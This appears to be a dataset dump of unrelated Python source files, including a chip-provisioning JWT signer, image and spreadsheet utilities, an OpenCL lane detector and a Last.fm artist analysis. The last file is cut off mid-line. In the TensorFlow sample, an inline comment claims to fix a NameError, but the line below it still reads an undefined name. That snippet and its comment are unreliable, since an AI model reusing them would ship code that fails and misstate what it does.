signing_pkg_payload[\"type\"] != Types.HSM_SIGNING_KEY_PKG:\n raise Exception(\"Invalid type on HSM signing key package\")\n if datetime.fromtimestamp(signing_pkg_payload[\"exp\"]) < datetime.now():\n raise Exception(\"HSM signing key package expired\")\n \n # create the RoT transfer authorization (that will go to the device)\n payload = {}\n payload[\"type\"] = Types.OEM_ROT_AUTH\n payload[\"oem_pub_key\"] = oem_pub_key\n payload[\"hsm_pub_key\"] = hsm_pub_key\n payload[\"prod_id\"] = prod_id\n payload[\"iat\"] = int(datetime.now().timestamp())\n rot_auth = Crypto.create_jwt(payload, oem_priv_key)\n\n # create the chain of trust\n cert = Crypto.create_x509_cert(signing_pub_key, oem_priv_key, prod_id)\n chain_of_trust = oem_chain_of_trust + [cert]\n\n # create the response\n exp = datetime.now() + timedelta(7)\n payload = {}\n payload[\"type\"] = Types.OEM_ROT_AUTH_PKG\n payload[\"iat\"] = int(datetime.now().timestamp())\n payload[\"exp\"] = int(exp.timestamp())\n payload[\"prod_id\"] = prod_id\n payload[\"rot_auth\"] = rot_auth\n payload[\"chain_of_trust\"] = chain_of_trust\n rot_auth_pkg = Crypto.create_jwt(payload, oem_priv_key)\n \n # create audit record\n signing_pkg_readable = Crypto.readable_jwt(signing_pkg)\n signing_pkg_readable[\"payload\"][\"cy_auth\"] = Crypto.readable_jwt(signing_pkg_readable[\"payload\"][\"cy_auth\"])\n signing_pkg_readable[\"payload\"][\"disti_auth\"] = Crypto.readable_jwt(signing_pkg_readable[\"payload\"][\"disti_auth\"])\n rot_auth_pkg_readable = Crypto.readable_jwt(rot_auth_pkg)\n rot_auth_pkg_readable[\"payload\"][\"rot_auth\"] = Crypto.readable_jwt(rot_auth_pkg_readable[\"payload\"][\"rot_auth\"])\n record = {}\n record[\"type\"] = Types.OEM_ROT_AUTH_PKG\n record[\"iat\"] = datetime.now().isoformat(' ')\n record[\"signing_pkg\"] = signing_pkg_readable\n record[\"rot_auth_pkg\"] = rot_auth_pkg_readable\n self.append_audit_record(record)\n \n return rot_auth_pkg\n\n def create_provision_request(self, blob):\n \"\"\"\n The OEM can create a request for provisioning by signing a keys & policies blob with its private key\n Note that blob must contain at least the prod_id field\n \"\"\"\n # create the request\n oem_priv_key = self.state[\"oem_priv_key\"]\n prov_req = Crypto.create_jwt(blob, oem_priv_key)\n \n # create audit record\n record = {}\n record[\"type\"] = 
Types.OEM_PROV_REQ\n        record[\"iat\"] = datetime.now().isoformat(' ')\n        record[\"prod_id\"] = blob[\"prod_id\"]\n        record[\"prov_req\"] = Crypto.readable_jwt(prov_req)\n        self.append_audit_record(record)\n        \n        return prov_req\n    \n    def pack_rot_auth(self, prod_id, hsm_pub_key):\n        oem_pub_key = self.state[\"oem_pub_key\"]\n        oem_priv_key = self.state[\"oem_priv_key\"]\n        \n        payload = {}\n        payload[\"type\"] = Types.OEM_ROT_AUTH\n        payload[\"oem_pub_key\"] = oem_pub_key\n        payload[\"hsm_pub_key\"] = hsm_pub_key\n        payload[\"prod_id\"] = prod_id\n        payload[\"iat\"] = int(datetime.now().timestamp())\n        rot_auth = Crypto.create_jwt(payload, oem_priv_key)\n        \n        return rot_auth\n","sub_path":"cysecuretools/execute/provisioning_lib/cyprov_oem.py","file_name":"cyprov_oem.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"610633763","text":"import re\n\nfrom pathlib import Path\n\nimport numpy as np\n\nimport click\n\nfrom imageio import imread, imsave\n\n\ndef grouper(n, iterable):\n    args = [iter(iterable)] * n\n    return map(list, zip(*args))\n\ndef sorted_nicely(l):\n    \"\"\"Return list sorted in the way that humans expect.\n\n    :param l: iterable to be sorted\n    :returns: sorted list\n    \"\"\"\n    convert = lambda text: int(text) if text.isdigit() else text\n    sort_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n    return sorted(l, key=sort_key)\n\ndef join_tiles_in_path(path, output_fpath='joined.png'):\n\n    files = sorted_nicely([str(f) for f in path.iterdir() if f.is_file()])\n\n    n_rows = 1 + max([int(fn.split('-')[3]) for fn in files])\n\n    images = [imread(f) for f in files]\n\n    joined = np.block(list(grouper(n_rows, images)))\n\n    print(joined.shape)\n\n    imsave(output_fpath, joined)\n\n\n@click.command()\n@click.argument('tile_dir')\ndef main(tile_dir):\n\n    tile_dir = Path(tile_dir)\n\n    join_tiles_in_path(tile_dir)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"scripts/join_output_tiles.py","file_name":"join_output_tiles.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"142938287","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport tensorflow as tf\n# a = tf.constant([3.0, 5.0])\n# b = tf.constant([8.0, 10.0])\n# result = a + b\n# sess = tf.Session()\n# variable = tf.constant(tf.zeros([2, 3]))\n# print(a.graph is tf.compat.v1.get_default_graph())\n# with tf.compat.v1.Session() as sess:\n#     print(sess.run(a))\n#     print(result)\n\nw1 = tf.Variable(tf.compat.v1.random.normal((2, 3), stddev=1, seed=1))\nw2 = tf.Variable(tf.compat.v1.random.normal((3, 1), stddev=1, seed=1))\n\nx = tf.compat.v1.placeholder(tf.float32, shape=(2, 2), name='input_data')\na = tf.matmul(x, w1)\ny = tf.matmul(a, w2)\niniter = None  # placeholder removed\niniter = tf.compat.v1.global_variables_initializer()\niniter = initer  # the original misspelled the name 'initer', so sess.run(initer) raised NameError; keep both bound\nwith tf.compat.v1.Session() as sess:\n    sess.run(initer)\n    # sess.run(w2.initializer)\n    print(sess.run(y, feed_dict={x: [[0.7, 0.99], [0.8, 0.5]]}))\n","sub_path":"大论文代码/第四章/tensorflow学习代码/sample01.py","file_name":"sample01.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564275085","text":"import numpy as np\nfrom numpy import genfromtxt\nimport csv\n# X = genfromtxt('features_face_AB.csv', delimiter=',')\n\nf = open('train_ranks_SVM.txt', 'r')\nb = f.read()\nX = eval(b)\n\nlabel_file = 'labels.txt'\nf2 = open(label_file, 'r')\nl = f2.read().split('\\n')\n\nfreq = []\nfor i in range(1, 9):\n    freq.append(l.count(str(i)))\n\nX_tr = []\nX_ts = []\n\nindex = 0\nfor p in freq:\n    i = index\n    j = index + 85\n    k = index + p\n\n    X_tr.extend(X[i:j])\n    X_ts.extend(X[j:k])\n    index = index + p  # advance to the next class block; without this every class read the same rows\n\nX_tr.extend(X_ts)\n\nprint(len(X_tr))\n","sub_path":"reordering.py","file_name":"reordering.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"577789769","text":"from openpyxl.utils import get_column_letter as gcl\nfrom importDict import number_from_column\nimport openpyxl\nimport os\nimport pygame\nimport sys\nimport time\n\n# GETS ALL COLUMNS FROM THIS ROW\n# print(sheet[1])\n\ndef addType():\n    # Uses sys.argv to pass in arguments\n    args = sys.argv[1:]\n    fileName = args[0]\n    string = args[1]\n    cols = args[2:]\n\n    # Open an existing excel file\n    wb = openpyxl.load_workbook(fileName)\n    sheet = wb.worksheets[0]\n\n    #################\n    # DO STUFF HERE #\n    #################\n    first = 2\n    last = sheet.max_row + 1\n    changes = 0\n    for col in cols:\n        for row in range(first, last):\n            if sheet[col + str(row)].value:\n                changes = changes + 1\n                sheet[gcl(number_from_column(col) + 1) + str(row)].value = string\n                print(col + str(row) + \":\", sheet[col + str(row)].value, '->', string)\n\n    print(\"Processed \" + str((last - first) * len(cols)) + \" rows...\")\n    print(\"Changed \" + str(changes) + \" values...\")\n\n    # add the word 'formatted' and save the new file where the original is\n    newName = string\n    index = fileName[::-1].find('/')\n    end = fileName[-index - 1:]\n    fileName = fileName[:-index - 1] + newName + end[0].capitalize() + end[1:]\n    print(\"Saving \" + fileName)\n    wb.save(fileName)\n\n    # LMK when the script is done\n    pygame.init()\n    pygame.mixer.music.load('/home/andrefisch/python/evan/note.mp3')\n    pygame.mixer.music.play()\n    time.sleep(5)\n    pygame.mixer.music.stop()\n\naddType()\n","sub_path":"addType.py","file_name":"addType.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353164552","text":"from heapq import *\nfrom collections import Counter\nfrom typing import List  # needed for the List[int] annotations below\n\nclass Solution:\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        num_freq_map = Counter(nums)\n        min_heap = []\n\n        for num, freq in num_freq_map.items():\n            heappush(min_heap, (freq, num))\n            if len(min_heap) > k:\n                heappop(min_heap)\n\n        top_nums = []\n        while min_heap:\n            top_nums.append(heappop(min_heap)[1])\n\n        return top_nums","sub_path":"leetcode/top-interview-questions/02_medium_collection/05_sorting_and_searching/02_top_k_frequent_elements.py","file_name":"02_top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"340922258","text":"import cv2\nimport pyopencl as cl\nimport numpy as np\nimport math\n\ndef setup():\n    try:\n        plaforms = cl.get_platforms()\n        global plaform\n        plaform = plaforms[0]\n\n        devices = plaform.get_devices()\n        global device\n        device = devices[0]\n\n        global ctx\n        ctx = cl.Context(devices)\n\n        global commQ\n        commQ = cl.CommandQueue(ctx, device)\n\n        file = open(\"prog.cl\", \"r\")\n        global prog\n        prog = cl.Program(ctx, file.read())\n        prog.build()\n        return True\n    except Exception as e:\n        print(e)\n        return False\n\ndef region(image):\n    polygon = np.array([\n        [(200, 142), (50, 400), (170, 400), (280, 250), (495, 250), (580, 400), (710, 400), (540, 142)]\n    ])\n\n    mask = np.zeros_like(image)\n    mask = cv2.fillPoly(mask, polygon, 
(255, 255, 255))\n mask = cv2.bitwise_and(image, mask)\n return mask\n\ndef lin_equ(l1, l2):\n m = (float)((l2[1] - l1[1]) / (l2[0] - l1[0]))\n c = (l2[1] - (m * l2[0]))\n return m, c\n\nif setup():\n\n # Video Capture\n pathname = \"Images/\"\n car_cascade = cv2.CascadeClassifier(pathname + 'cars3.xml')\n logo_red = cv2.imread(pathname + 'warning.png')\n logo_green = cv2.imread(pathname + 'green.png')\n vidCap = cv2.VideoCapture(\"video1_cut.mp4\")\n\n img_width = np.int32(720)\n img_height = np.int32(540)\n max_rho = np.int32(math.sqrt(math.pow(img_width, 2) + math.pow(img_height, 2)))\n max_theta = np.int32(180)\n votes_matrix = np.zeros((max_rho, max_theta), dtype=np.int32)\n\n costheta_values = np.cos(np.arange(-np.pi / 2, np.pi / 2, np.pi / 180), dtype=np.float32)\n sentheta_values = np.sin(np.arange(-np.pi / 2, np.pi / 2, np.pi / 180), dtype=np.float32)\n\n max_values_rho = np.zeros((2, 1), dtype=np.int32)\n max_values_theta = np.zeros((2, 1), dtype=np.int32)\n max_votes = np.zeros((2, 1), dtype=np.int32)\n threshold = np.int32(175)\n\n if not vidCap.isOpened():\n print(\"Video File Not Found\")\n exit(-1)\n\n while True:\n\n ret, vidFrame = vidCap.read()\n if not ret:\n break\n vidFrame = cv2.resize(vidFrame, (720, 540))\n crop_img = region(vidFrame)\n\n crop_img_gray = cv2.cvtColor(vidFrame, cv2.COLOR_BGR2GRAY)\n ############################# Binarization ######################################\n crop_img_gray = cv2.adaptiveThreshold(crop_img_gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 201,\n -30)\n imgIn_new = region(crop_img_gray)\n imgIn_new = cv2.cvtColor(imgIn_new, cv2.COLOR_BGR2BGRA)\n imgOut = np.copy(imgIn_new)\n\n img_width = np.int32(imgIn_new.shape[1])\n img_height = np.int32(imgIn_new.shape[0])\n\n ########################################### Hough Transform ###########################################################\n kernelName = prog.hough_tf\n imgFormat = cl.ImageFormat(cl.channel_order.BGRA, cl.channel_type.UNSIGNED_INT8)\n imgInBuffer = cl.Image(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n format=imgFormat,\n shape=(img_width, img_height),\n pitches=(imgIn_new.strides[0], imgIn_new.strides[1]),\n hostbuf=imgIn_new.data)\n\n costhetaBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n hostbuf=costheta_values)\n\n senthetaBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_ONLY,\n hostbuf=sentheta_values)\n\n votesBuffer = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=votes_matrix)\n\n kernelName.set_arg(0, imgInBuffer)\n kernelName.set_arg(1, votesBuffer)\n kernelName.set_arg(2, costhetaBuffer)\n kernelName.set_arg(3, senthetaBuffer)\n kernelName.set_arg(4, max_rho)\n kernelName.set_arg(5, max_theta)\n kernelName.set_arg(6, img_width) # Width\n kernelName.set_arg(7, img_height) # Height\n\n workGroupSize = (\n math.ceil(np.int32(imgOut.shape[1]) / 32) * 32, math.ceil(np.int32(imgOut.shape[0]) / 32) * 32)\n workItemSize = (32, 32) # 1024\n\n kernelEvent = cl.enqueue_nd_range_kernel(commQ, kernelName, global_work_size=workGroupSize,\n local_work_size=workItemSize)\n kernelEvent.wait()\n\n ######################################## Select Max ######################################################################\n # Select max rho and theta\n kernelName = prog.select_max_matrix\n\n max_rho_buff = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_values_rho)\n\n max_theta_buff = cl.Buffer(ctx, 
flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_values_theta)\n max_votes_buff = cl.Buffer(ctx, flags=cl.mem_flags.COPY_HOST_PTR | cl.mem_flags.READ_WRITE,\n hostbuf=max_votes)\n\n kernelName.set_arg(0, votesBuffer)\n kernelName.set_arg(1, max_rho)\n kernelName.set_arg(2, max_theta)\n kernelName.set_arg(3, max_rho_buff)\n kernelName.set_arg(4, max_theta_buff)\n kernelName.set_arg(5, max_votes_buff)\n\n workGroupSize = (1, 1)\n workItemSize = (1, 1)\n\n kernelEvent = cl.enqueue_nd_range_kernel(commQ, kernelName, global_work_size=workGroupSize,\n local_work_size=workItemSize)\n kernelEvent.wait()\n\n cl.enqueue_copy(commQ, max_values_rho, max_rho_buff)\n cl.enqueue_copy(commQ, max_values_theta, max_theta_buff)\n a = math.cos(math.radians(max_values_theta[0]))\n b = math.sin(math.radians(max_values_theta[0]))\n x0 = a * max_values_rho[0]\n y0 = b * max_values_rho[0]\n pt1 = (int(x0 + 1000 * (-b)), int(y0 + 1000 * (a)))\n pt2 = (int(x0 - 1000 * (-b)), int(y0 - 1000 * (a)))\n m_blue, b_blue = lin_equ(pt1, pt2)\n if m_blue != 0:\n cv2.line(vidFrame, pt1, (int((70 - b_blue) / m_blue), 70), (255, 0, 0), 2, cv2.LINE_AA)\n else:\n cv2.line(vidFrame, pt1, pt2, (255, 0, 0), 2, cv2.LINE_AA)\n\n a = math.cos(math.radians(max_values_theta[1]))\n b = math.sin(math.radians(max_values_theta[1]))\n x0 = a * max_values_rho[1]\n y0 = b * max_values_rho[1]\n pt3 = (int(x0 + 1000 * (-b)), int(y0 + 1000 * (a)))\n pt4 = (int(x0 - 1000 * (-b)), int(y0 - 1000 * (a)))\n m_red, b_red = lin_equ(pt3, pt4)\n if m_red != 0:\n cv2.line(vidFrame, (int((420 - b_red) / m_red), 420), (int((70 - b_red) / m_red), 70), (0, 0, 255), 2,\n cv2.LINE_AA)\n else:\n cv2.line(vidFrame, pt3, pt4, (255, 0, 0), 2, cv2.LINE_AA)\n\n crop_img_car = vidFrame[0:410, 50:50 + 500] # ROI\n imgGray = cv2.cvtColor(crop_img_car, cv2.COLOR_BGR2GRAY)\n vidFrame[30:30 + 100, 30:30 + 100] = logo_green\n cars = car_cascade.detectMultiScale(imgGray, 1.4, 3)\n for (x, y, w, h) in cars:\n if (y + h) >= 90:\n cX = int((x + x + w) / 2.0)\n cY = int((y + y + h) / 2.0)\n if (cY) + m_red * (cX) + b_red > 0 and (cY) + m_blue * (cX) + b_blue > 0:\n vidFrame[30:30+100, 30:30+100] = logo_red\n cv2.rectangle(crop_img_car, (x, y), (x + w, y + h), (0, 0, 255), 2)\n else:\n cv2.rectangle(crop_img_car, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n imgInBuffer.release()\n votesBuffer.release()\n max_rho_buff.release()\n max_theta_buff.release()\n\n cv2.imshow('Car and Lane detection', vidFrame)\n if cv2.waitKey(10) & 0xFF == ord('q'): # 'q' key to close window\n break\n\n vidCap.release()\n cv2.destroyAllWindows()","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401374652","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torchvision\nfrom torchvision import models\n\nfrom train_set import MiniPlacesDataset\nfrom fine_tuning_config_file import *\n\nimport sys\n\nimport os\n\n# Outputs a file containing top5 outputs and actual label.\n# Used to analyze our network and collect data for the\n# write-up.\n\ndef compute_metrics(model, use_gpu, output_path, test_options):\n print(output_path)\n mode = output_path.split('/')[-1]\n mode = mode.split('_')[0]\n data_dir = os.path.expanduser(DATA_PATH)\n test_options['labels_path'] = os.path.join(data_dir, mode + '.txt')\n print(test_options)\n\n testloader = MiniPlacesDataset(\n photos_path = 
test_options['photos_path'],\n        labels_path = test_options['labels_path'],\n        transform = test_options['transform']\n    )\n    data_loader = torch.utils.data.DataLoader(testloader, batch_size=1)\n    model.eval()\n    output_labels = []\n    for data in data_loader:\n        inputs, labels = data\n\n        inputs = Variable(inputs.float().cuda())\n        labels = Variable(labels.long().cuda())\n\n        output = model(inputs)\n        probabilities, prediction = output.topk(5, dim=1, largest=True, sorted=True)\n\n        prediction = [str(elt) for elt in prediction.data[0]]\n        prediction += [str(prb) for prb in probabilities.data[0]]\n        prediction.append(str(labels.data[0]))\n        prediction = \" \".join(prediction)\n        print(prediction)\n        output_labels.append(prediction)\n\n    output_labels = \"\\n\".join(output_labels)\n    with open(output_path, 'w') as outfile:\n        outfile.write(output_labels)\n","sub_path":"Resnet Code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557229491","text":"import argparse, math, numpy, os, sys, tables\nimport time\n\ndef write_hdf5(inputfiles, motif_file_name, idx=1):\n    \"\"\"Save all motif data in the current directory into an hdf5 file.\"\"\"\n\n    h5file = tables.open_file(motif_file_name, \"a\", driver=\"H5FD_CORE\")\n\n    for inputfile in inputfiles:\n        fname = os.path.split(inputfile)[1]\n        name = fname.split('.')[0]\n        ext = fname.split('.')[1]\n        if ext != 'txt':\n            continue  # skip non-.txt files; the original 'pass' here had no effect\n        l = []\n        name = name.replace('::', '_')\n        try:\n            a = h5file.get_node(\"/\", name)\n        except tables.NoSuchNodeError:\n            fp = open(inputfile)\n            for i, line in enumerate(fp.readlines()):\n                f = line.split()\n                l += [float(f[idx])]\n            A = numpy.array(l)\n            h5a = h5file.create_array(h5file.root, name, A)\n            h5a.flush()\n\n    h5file.close()\n    return\n\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser(description=\"\"\"Compute motif enrichment from pre-calculated data e.g. DHS peaks.\"\"\")\n    parser.add_argument('-i', dest='colindex', type=int, default=1, required=False, help='Column with values (starting at 0) for generating the hdf5 file.')\n    parser.add_argument('-n', dest='name', required=True, help='The prefix of the output hdf5 file.')\n    parser.add_argument('-f', dest='files', required=True, nargs=\"+\", help='The files to pack into the hdf5 file.' 
)\n \n args = parser.parse_args()\n output = args.name\n print(args.files)\n write_hdf5( args.files, output, idx=args.colindex )\n\n\n","sub_path":"Py3_MARGE/marge/createHDF5.py","file_name":"createHDF5.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557229491","text":"import argparse\nimport json\nimport numpy as np\n\nDEFAULT_CSV_FILE = \"data/example0.csv\"\nDEFAULT_JS_FILE = \"data.js\"\nNETS_TO_WIRE_NAMES_FILES = \"nets_to_wire_names.csv\"\nVDD = 1.2 # Volts\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Train a deep controller on Toyworld.\")\n parser.add_argument(\n \"--csv_file\",\n help=\"Path to CSV file.\",\n default=DEFAULT_CSV_FILE)\n parser.add_argument(\n \"--js_file\",\n help=\"Path to .js file.\",\n default=DEFAULT_JS_FILE)\n args = parser.parse_args()\n csv_file = args.csv_file\n js_file = args.js_file\n\n mapping_matrix = get_mapping_matrix(csv_file)\n raw_array = np.genfromtxt(csv_file, delimiter=',', skip_header=1)\n js_string = get_save_str_from_raw_array(raw_array, mapping_matrix)\n save_str(js_file, js_string)\n\ndef get_mapping_matrix(csv_file):\n \"\"\"\n The original array is a bunch of columns. Their position on the actual board\n is not cleanly mapped.\n\n This function returns a matrix M such that:\n\n M[x][y] = column in the original array of the (x, y) position on the board\n \"\"\"\n raw_nets_to_wire_names_data = np.genfromtxt(\n NETS_TO_WIRE_NAMES_FILES,\n delimiter=',',\n skip_header=1,\n dtype=str)\n raw_headers = np.genfromtxt(csv_file, delimiter=',', max_rows=1, dtype=str)\n return get_mapping_matrix_from_raw_data(\n raw_nets_to_wire_names_data,\n raw_headers)\n\ndef get_mapping_matrix_from_raw_data(nets_to_wire, raw_headers):\n xy_to_net = get_xy_to_net_dict(nets_to_wire)\n net_to_colm = get_net_to_colm(raw_headers)\n\n mapping_matrix = np.zeros((8, 8), dtype=int)\n for x in range(8):\n for y in range(8):\n net = xy_to_net[(x, y)]\n mapping_matrix[x, y] = net_to_colm[net]\n\n return mapping_matrix\n\ndef get_xy_to_net_dict(nets_to_wire):\n return dict(((int(x), int(y)), net) for x, y, net in nets_to_wire)\n\ndef get_net_to_colm(raw_headers):\n def clean_header(h):\n net = h.split(' ')[0]\n if net[0] == '/':\n net = net[1:]\n return net\n nets = [clean_header(h) for h in raw_headers]\n return dict((net, i) for i, net in enumerate(nets))\n\ndef get_save_str_from_raw_array(raw_array, mapping_matrix):\n array = threshold_array(raw_array)\n array = rearrange_array(array, mapping_matrix)\n return get_save_string_from_clean_array(array)\n\ndef rearrange_array(array, mapping_matrix):\n \"\"\"Convert 64xn to 8x8xn by using the mapping matrix.\"\"\"\n simulation_length = array.shape[0]\n new_array = np.zeros((simulation_length, 8, 8), dtype=int)\n for y in range(8):\n for x in range(8):\n i = mapping_matrix[x, y]\n new_array[:, y, x] = array[:, i]\n return flip_array_vertically(new_array)\n\ndef flip_array_vertically(array):\n return array[:, ::-1, :]\n\ndef threshold_array(array):\n bool_array = array >= (VDD/2)\n return bool_array.astype(int)\n\ndef get_save_string_from_clean_array(array):\n lst_array = array.tolist()\n json_str = json.dumps(lst_array)\n return \"data = '{0}';\".format(json_str)\n\ndef save_str(fname, string):\n with open(fname, 'w') as f:\n f.write(string)\n print(\"Results saved to '{0}'\".format(fname))\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"javascript/csv_to_js.py","file_name":"csv_to_js.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135059967","text":"import secrets\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sqlite3\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport webbrowser\n\n#Database name and also Json file name for reference\nDBNAME = 'artists.db'\nFINALJSON = 'final.json'\n\n#API keys for Last.fm web API call\nAPI_KEY = secrets.API_KEY\nSHARED_SECRET = secrets.SHARED_SECRET\n\n#caching function\nCACHE_FNAME = 'final.json'\ntry:\n cache_file = open(CACHE_FNAME, 'r')\n cache_contents = cache_file.read()\n CACHE_DICTION = json.loads(cache_contents)\n cache_file.close()\nexcept:\n CACHE_DICTION = {}\n\n#make unique combo for web api call\ndef params_unique_combination(baseurl, params):\n alphabetized_keys = sorted(params.keys())\n res = []\n for k in alphabetized_keys:\n res.append(\"{}-{}\".format(k, params[k]))\n return baseurl + \"_\".join(res)\n\n#make the actual web api request with caching\ndef make_request_using_cache(baseurl, params):\n unique_ident = params_unique_combination(baseurl, params)\n if unique_ident in CACHE_DICTION:\n print('getting cached data...')\n return CACHE_DICTION[unique_ident]\n else:\n resp = requests.get(baseurl, params)\n data = json.loads(resp.text)\n CACHE_DICTION[unique_ident] = data\n dumped_json_cache = json.dumps(CACHE_DICTION, indent = 4)\n fw = open(CACHE_FNAME,'w')\n fw.write(dumped_json_cache)\n fw.close()\n return CACHE_DICTION[unique_ident]\n\n#country class to create instances\nclass Country():\n\n def __init__(self, name):\n self.type = type\n self.name = name\n \n def __str__(self):\n return self.name\n \n#make the web api call for top artists in any country with the proper ISO 3166-1 name\n#this function also adds json information from the api call to the caching file final.json\ndef get_top_country_artists(country):\n baseurl = 'http://ws.audioscrobbler.com/2.0/?'\n params = {}\n params['method'] = 'geo.gettopartists'\n params['country'] = country\n params['api_key'] = API_KEY\n params['format'] = 'json'\n \n first_search = make_request_using_cache(baseurl, params)\n\n#make the empty SQLite table known as Top Artists in the database artists.db\ndef make_artist_table():\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n statement = \"DROP TABLE IF EXISTS 'Top Artists';\"\n cur.execute(statement)\n \n statement = \"\"\"\n CREATE TABLE 'Top Artists' (\n 'Name' TEXT,\n 'Listeners' INTEGER,\n 'Mbid' TEXT,\n 'Url' TEXT,\n 'Country' TEXT);\n \"\"\"\n cur.execute(statement)\n conn.commit()\n conn.close()\n\n#goes through the cache file final.json and parses through the data for the names of popular artist in that country, number of listeners for the artists, url to artists page, and country that people are searching about\ndef populate_json():\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n with open(FINALJSON) as file:\n json_file = json.load(file)\n artists = json_file\n artists2 = json_file\n random_string_param = list(artists.keys())\n keys = random_string_param\n for x in keys:\n a1 = artists[x]['topartists']['artist']\n attr = artists[x]['topartists']['@attr']\n origin = attr['country']\n for i in a1:\n insertion = (i['name'], i['listeners'], i['mbid'], i['url'], origin)\n statement = \"INSERT INTO 'Top Artists'\"\n statement += \"VALUES (?,?,?,?,?)\"\n 
cur.execute(statement, insertion)\n conn.commit()\n conn.close()\n\n#goes through Top Artists table in the artist.db database and queries for the top 10 artists for the select country. The query is then put into a dataframe where plotly can graph the data into a bar graph. The x axis shows the names of the artists, y axis shows the number of listeners each artists has, the hover value shows the country that was searched along with the artists listener number and the color distinguishes the popularity for the artists for that specific country\ndef country_bar_plot(country):\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country,))\n data = cur.fetchall()\n rank = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n str(data)\n df = pd.DataFrame([[ij for ij in i] for i in data])\n df.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n df['Rank'] = rank\n print(df)\n df = df.sort_values(['Listeners'], ascending=[1])\n \n graph_data = df\n fig = px.bar(graph_data, x='Name', y='Listeners',\n hover_data=['Listeners', 'Country'], color='Rank',\n labels={'Listeners':'Number of Followers for Artist'}, height=400)\n fig.show()\n\n#This function takes five country arguments and calls on them all and adds each country's data to the caching file and Top Artist table in artists.db. It then queries the table to put the arguments into a concatenated dataframe. It then finds the top 5 most frequent artist names in the dataframe and creates a pie chart with hover values showing the frequency of the artists between the 5 countries selected\ndef compare_countries(country1, country2, country3, country4, country5):\n conn = sqlite3.connect(DBNAME)\n cur = conn.cursor()\n get_top_country_artists(country1)\n get_top_country_artists(country2)\n get_top_country_artists(country3)\n get_top_country_artists(country4)\n get_top_country_artists(country5)\n \n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country1,))\n data1 = cur.fetchall()\n str(data1)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country2,))\n data2 = cur.fetchall()\n str(data2)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country3,))\n data3 = cur.fetchall()\n str(data3)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? LIMIT 10\", (country4,))\n data4 = cur.fetchall()\n str(data4)\n cur.execute(\"SELECT Name, Listeners, Country FROM 'Top Artists' WHERE Country = ? 
